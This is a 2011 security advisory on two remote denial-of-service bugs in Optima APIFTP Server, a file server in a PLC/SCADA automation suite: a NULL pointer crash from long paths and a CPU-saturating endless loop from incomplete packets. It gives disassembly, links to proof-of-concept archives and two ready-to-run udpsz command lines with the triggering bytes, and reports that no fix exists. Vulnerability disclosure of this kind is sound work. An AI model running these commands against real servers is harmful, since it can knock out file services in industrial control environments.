Optima APIFTP Server <= 1.5.2.13 Multiple Vulnerabilities
2011-11-14 09:15:12#######################################################################
Luigi Auriemma
Application: Optima APIFTP Server
http://www.optimalog.com/home.html
Versions: <= 1.5.2.13
Platforms: Windows
Bugs: A] NULL pointer
B] endless loop
Exploitation: remote
Date: 13 Nov 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Optima is a suite of automation software for controlling PLC via
SCADA/HMI interface.
APIFTP Server is a file server for working with remote files located on
shared folders.
#######################################################################
=======
2) Bugs
=======
---------------
A] NULL pointer
---------------
NULL pointer exploitable through too long path names.
The effect is the displaying of a MessageBox with the error and the
continuing of the execution that will lead to a stack exaustion after
some seconds and the termination of the server.
---------------
B] endless loop
---------------
Endless loop with CPU at 100% caused by incomplete packets:
004A9C93 8B03 /MOV EAX,DWORD PTR DS:[EBX]
004A9C95 8B80 78010000 |MOV EAX,DWORD PTR DS:[EAX+178]
004A9C9B 2D B80B0000 |SUB EAX,0BB8 ; Switch (cases BB8..BE0)
004A9CA0 74 19 |JE SHORT APIFTPSe.004A9CBB
004A9CA2 83E8 14 |SUB EAX,14
004A9CA5 74 47 |JE SHORT APIFTPSe.004A9CEE
004A9CA7 83E8 0A |SUB EAX,0A
004A9CAA 0F84 9D000000 |JE APIFTPSe.004A9D4D
004A9CB0 83E8 0A |SUB EAX,0A
004A9CB3 0F84 CA000000 |JE APIFTPSe.004A9D83
004A9CB9 ^EB D8 |JMP SHORT APIFTPSe.004A9C93
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/18112.zip
A]
udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107
wait some seconds, the tool will quit automatically
B]
udpsz -C "e803 0400 00" -T -D SERVER 10260 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.